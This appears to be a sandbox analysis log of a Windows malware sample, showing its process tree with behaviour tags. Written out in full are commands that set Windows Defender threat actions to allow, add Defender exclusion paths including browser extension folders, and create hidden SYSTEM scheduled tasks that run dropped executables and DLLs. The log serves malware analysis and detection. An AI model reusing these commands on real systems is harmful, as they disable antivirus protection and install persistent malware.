C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2036
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2220
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CsUgOGApU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CsUgOGApU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VQnigEewLHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VQnigEewLHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YXRVthYkCAsAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YXRVthYkCAsAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eBaLNwdfBoAU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eBaLNwdfBoAU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\feaAGXZTPHSTZufvckR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\feaAGXZTPHSTZufvckR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dHiLAKBZJoSzXVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dHiLAKBZJoSzXVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rlXICvrLwbHDFviC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rlXICvrLwbHDFviC\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:323⤵PID:4672
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:324⤵PID:3216
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:643⤵PID:3860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VQnigEewLHUn" /t REG_DWORD /d 0 /reg:323⤵PID:4448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VQnigEewLHUn" /t REG_DWORD /d 0 /reg:643⤵PID:1440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YXRVthYkCAsAC" /t REG_DWORD /d 0 /reg:323⤵PID:3528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YXRVthYkCAsAC" /t REG_DWORD /d 0 /reg:643⤵PID:4668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eBaLNwdfBoAU2" /t REG_DWORD /d 0 /reg:323⤵PID:1888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eBaLNwdfBoAU2" /t REG_DWORD /d 0 /reg:643⤵PID:4824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\feaAGXZTPHSTZufvckR" /t REG_DWORD /d 0 /reg:323⤵PID:1520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\feaAGXZTPHSTZufvckR" /t REG_DWORD /d 0 /reg:643⤵PID:484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dHiLAKBZJoSzXVVB /t REG_DWORD /d 0 /reg:323⤵PID:796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dHiLAKBZJoSzXVVB /t REG_DWORD /d 0 /reg:643⤵PID:3288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI /t REG_DWORD /d 0 /reg:323⤵PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI /t REG_DWORD /d 0 /reg:643⤵PID:2932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rlXICvrLwbHDFviC /t REG_DWORD /d 0 /reg:323⤵PID:3196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rlXICvrLwbHDFviC /t REG_DWORD /d 0 /reg:643⤵PID:4360
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gIKODGLWO" /SC once /ST 14:58:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gIKODGLWO"2⤵PID:3112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gIKODGLWO"2⤵PID:2276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TVsECgUtwDhLZifMW" /SC once /ST 02:25:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\JnHyQAL.exe\" I3 /jKsite_idrPP 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TVsECgUtwDhLZifMW"2⤵PID:4176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4284 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3692
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4088
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4880
-
C:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\JnHyQAL.exeC:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\JnHyQAL.exe I3 /jKsite_idrPP 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4172 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bHNJINcAmGBfsLXkXG"2⤵PID:1336
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:3056
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2840
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:4904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CsUgOGApU\LYwOmk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jHYEWeDFllXYdol" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jHYEWeDFllXYdol2" /F /xml "C:\Program Files (x86)\CsUgOGApU\hFfRJMW.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jHYEWeDFllXYdol"2⤵PID:2528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jHYEWeDFllXYdol"2⤵PID:2340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "opRoyIfSGoYQul" /F /xml "C:\Program Files (x86)\eBaLNwdfBoAU2\PITLvpj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ipVEcCYbpTyEb2" /F /xml "C:\ProgramData\dHiLAKBZJoSzXVVB\nSzhFmc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NdTWWpscfLExPZKYg2" /F /xml "C:\Program Files (x86)\feaAGXZTPHSTZufvckR\cEAFCnu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "auFylssPRYUhOjCZxxH2" /F /xml "C:\Program Files (x86)\YXRVthYkCAsAC\BoCDqLt.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IypqguOSOyxhMfXuI" /SC once /ST 06:22:39 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rlXICvrLwbHDFviC\hiFaRPeg\WbmUCLr.dll\",#1 /Tjsite_idcfw 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "IypqguOSOyxhMfXuI"2⤵PID:2988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TVsECgUtwDhLZifMW"2⤵PID:4388
-
-
